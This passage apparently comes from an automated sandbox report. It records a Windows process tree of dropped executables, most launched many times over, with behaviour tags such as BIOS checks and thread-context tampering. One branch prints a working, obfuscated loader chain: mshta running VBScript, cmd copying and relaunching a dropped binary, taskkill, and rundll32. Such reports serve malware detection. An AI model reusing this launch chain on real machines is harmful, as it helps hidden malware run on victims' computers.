    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13588
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:14072
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13800
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:14520
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:14996
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15352
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:14744
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8480
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:12280
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15216
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15064
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8404
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15780
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15528
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:11324
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15532
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:16220
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15640
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:14904
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13816
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:16632
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:16996
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:17364
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:16928
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:17780
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13520
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:17984
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15440
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:16104
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:18812
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:19136
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:18016
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:18660
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:18744
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:16992
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7672
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:19748
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:20028
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:20320
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:17164
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:19848
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:16604
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:20060
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:19192
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:11272
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:20516
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:21368
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:21116
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:20844
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:20608
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:10720
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:21112
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:15416
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13232
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:21032
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:21524
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:21804
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:22068
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:22400
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13348
- C:\Users\Admin\Documents\UK51TetNQgokP7kDNvUpo1pU.exe
  "C:\Users\Admin\Documents\UK51TetNQgokP7kDNvUpo1pU.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:420
- C:\Users\Admin\Documents\AbqoUlyTYB4LRzeoLjvacv43.exe
  "C:\Users\Admin\Documents\AbqoUlyTYB4LRzeoLjvacv43.exe"
  2⤵
  - Executes dropped EXE
  PID:588
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VbsCrIPt: cLOSe( CREAteobjecT ("wScRiPT.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /C tYpe ""C:\Users\Admin\Documents\AbqoUlyTYB4LRzeoLjvacv43.exe"" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi & if """"== """" for %m in ( ""C:\Users\Admin\Documents\AbqoUlyTYB4LRzeoLjvacv43.exe"" ) do taskkill /iM ""%~NXm"" -F" ,0 , TRUE ))
    3⤵
    PID:5032
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C tYpe "C:\Users\Admin\Documents\AbqoUlyTYB4LRzeoLjvacv43.exe" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi& if ""== "" for %m in ("C:\Users\Admin\Documents\AbqoUlyTYB4LRzeoLjvacv43.exe" ) do taskkill /iM "%~NXm" -F
      4⤵
      PID:4728
    - - C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE
        
        IQ0v_FE_.ExE -poRsuYEMryiLi
        5⤵
        Executes dropped EXE
        
        PID:4968
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPt: cLOSe( CREAteobjecT ("wScRiPT.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /C tYpe ""C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE"" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi & if ""-poRsuYEMryiLi""== """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE"" ) do taskkill /iM ""%~NXm"" -F" ,0 , TRUE ))
        6⤵
        
        PID:6784
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi& if "-poRsuYEMryiLi"== "" for %m in ("C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE" ) do taskkill /iM "%~NXm" -F
        7⤵
        
        PID:5624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:6184
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" VHTDDahA.G,XBvVyh
        6⤵
        
        PID:1448
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /iM "AbqoUlyTYB4LRzeoLjvacv43.exe" -F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5892
- C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
  "C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1036
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:5000
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:4500
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:3860
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:728
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:5104
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:5324
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:5568
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:5960
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:5364
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    - Executes dropped EXE
    PID:4492
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:5356
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:5520
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:2376
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:5460
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:4828
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6304
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6592
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6932
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:4648
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6620
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6988
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6516
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:5420
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:800
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:4592
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:7568
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:7908
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:1716
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:5716
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8088
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:3948
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:1180
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:5368
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8000
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:1448
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:7976
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8432
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8792
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8232
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8856
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:4560
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8460
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6796
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:7008
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:9416
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:9800
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:10120
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:7528
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8164
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:5500
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:10568
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:10912
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11252
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:10660
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11016
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8220
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8284
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11284
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11652
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:12020
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:9052
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:7380
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:2216
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:12240
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:2532
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8528
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:7012
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8152
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:9808
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:9860
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11704
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:2740
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
